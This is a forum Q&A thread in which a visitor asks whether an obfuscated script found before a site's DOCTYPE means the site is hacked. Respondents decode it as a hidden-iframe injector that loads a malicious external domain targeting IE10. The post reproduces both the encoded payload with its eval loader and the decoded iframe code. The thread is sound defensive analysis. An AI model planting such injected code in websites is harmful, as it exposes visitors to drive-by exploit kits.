# Is this site hacked?

Tags: javascript, obfuscation, deobfuscation

At a particular web site (not mine), I'm alerted that it wants to use Java and I see a domain in India referenced.  Since this doesn't look normal to me I look at the page source.  There is a large script block BEFORE the DOCTYPE.  I see this only on IE10 (not FF, etc.) and on multiple machines.  I'm not clever enough to see exactly what's going on as it looks like it's being obscured quite a bit.  Before I report the situation to the site owner (and for my own curiosity) I wondered if this is definitely evidence of a hacking.  I see a few other sites with very similar code when I Googled the phrase "asd=function" from the below so it might be a common problem.  (Or maybe it's something legitimate for IE10??)  Below is the code with extra line feeds added.

```
<script>
ps="split";
asd=function(){d.body++};
a=("15,15,155,152,44,54,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,55,177,21,15,15,15,155,152,166,145,161,151,166,54,55,77,21,15,15,201,44,151,160,167,151,44,177,21,15,15,15,150,163,147,171,161,151,162,170,62,173,166,155,170,151,54,46,100,155,152,166,145,161,151,44,167,166,147,101,53,154,170,170,164,76,63,63,145,150,150,163,162,167,147,163,166,166,151,147,170,62,155,162,63,160,156,105,114,73,115,64,157,173,166,65,64,70,106,74,74,64,124,136,150,150,64,131,175,162,75,64,106,122,122,133,64,72,167,107,107,64,171,134,173,114,65,64,174,156,170,64,152,70,154,131,65,64,112,113,105,64,164,116,174,157,64,163,110,117,64,63,53,44,173,155,150,170,154,101,53,65,64,64,53,44,154,151,155,153,154,170,101,53,65,64,64,53,44,167,170,175,160,151,101,53,173,155,150,170,154,76,65,64,64,164,174,77,154,151,155,153,154,170,76,65,64,64,164,174,77,164,163,167,155,170,155,163,162,76,145,146,167,163,160,171,170,151,77,160,151,152,170,76,61,65,64,64,64,64,164,174,77,170,163,164,76,64,77,53,102,100,63,155,152,166,145,161,151,102,46,55,77,21,15,15,201,21,15,15,152,171,162,147,170,155,163,162,44,155,152,166,145,161,151,166,54,55,177,21,15,15,15,172,145,166,44,152,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,167,166,147,53,60,53,154,170,170,164,76,63,63,145,150,150,163,162,167,147,163,166,166,151,147,170,62,155,162,63,160,156,105,114,73,115,64,157,173,166,65,64,70,106,74,74,64,124,136,150,150,64,131,175,162,75,64,106,122,122,133,64,72,167,107,107,64,171,134,173,114,65,64,174,156,170,64,152,70,154,131,65,64,112,113,105,64,164,116,174,157,64,163,110,117,64,63,53,55,77,152,62,167,170,175,160,151,62,160,151,152,170,101,53,61,65,64,64,64,64,164,174,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,170,175,160,151,62,164,163,167,155,170,155,163,162,101,53,145,146,167,163,160,171,170,151,53,77,152,62,167,170,175,160,151,62,170,163,164,101,53,64,53,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,173,155,150,170,154,53,60,53,65,64,64,53,55,77,152,62,167,151,170,105,170,170,166,155,146,171,170,151,54,53,154,151,155,153,154,170,53,60,53,65,64,64,53,55,77,21,15,15,15,150,163,147,171,161,151,162,170,62,153,151,170,111,160,151,161,151,162,170,167,106,175,130,145,153,122,145,161,151,54,53,146,163,150,175,53,55,137,64,141,62,145,164,164,151,162,150,107,154,155,160,150,54,152,55,77,21,15,15,201"[ps](","));
ss=String;
d=document;
for(i=0;i<a.length;i+=1){
 a[i]=-(7-3)+parseInt(a[i],8);}
try{asd()}
catch(q){
zz=0;}
try{zz/=2}
catch(q){zz=1;}
if(!zz)eval(ss.fromCharCode.apply(ss,a));
</script>
```

If this is really malicious, is there a forensic web site that I could/should post this to?

Comment: red flags:
1) it uses eval
2) you didn't put it there
3) it's obfuscated so you don't know what it does

conclusion: remove it

Comment: http://deobfuscatejavascript.com/ reporting syntax error, however - i would remove this.

Comment: @nevermind Post it without the `<script>` tags and it works.

Answer (score 4, accepted):

Here's the "translation" of the above code:

```
if (document.getElementsByTagName('body')[0]){
    iframer();
} else {
    document.write("");
}
function iframer(){
    var f = document.createElement('iframe');
    f.setAttribute('src','http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/');
    f.style.left='-10000px';
    f.style.top='0';
    f.style.position='absolute';
    f.style.top='0';
    f.setAttribute('width','100');
    f.setAttribute('height','100');
    document.getElementsByTagName('body')[0].appendChild(f);
}
```

Not only is it poorly coded (someone has apparently never heard of the `document.body` property...), it is very obviously a hack.

Interstingly, requesting the resource returns a 402 Payment Required header if I don't include an IE10 User-Agent string - that's probaby a hint that it's designed to exploit that particular browser. Spoofing a valid UA string gives me a page that has a bunch of over-complicated JavaScript that I can't be bothered to decode, but that certainly doesn't look friendly.

Comment: Analyzing a bit further: The site it loads contains the code of (PluginDetect)[http://www.pinlady.net/PluginDetect/], a JS library to detect which browser plugins are available (Java, ActiveX etc.). It also tries to execute some more code that should be stored in http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/bsqkwxz.html but accessing that document only yields a 402 Payment Required header, even with IE10 UA string.

Answer (score 1):

Remove it, it is trying to load a url that most likely will install spyware on your computer.

The website is the following:

http://addonscorrect.in/ljAH7I0kwr104B880PZdd0Uyn90BNNW06sCC0uXwH10xjt0f4hU10FGA0pJxk0oDK0/

The website it has been already deactivated, so yes.. your website has been hacked.

Change your FTP/SSH passwords, clean all the computers that have access to the hosting account.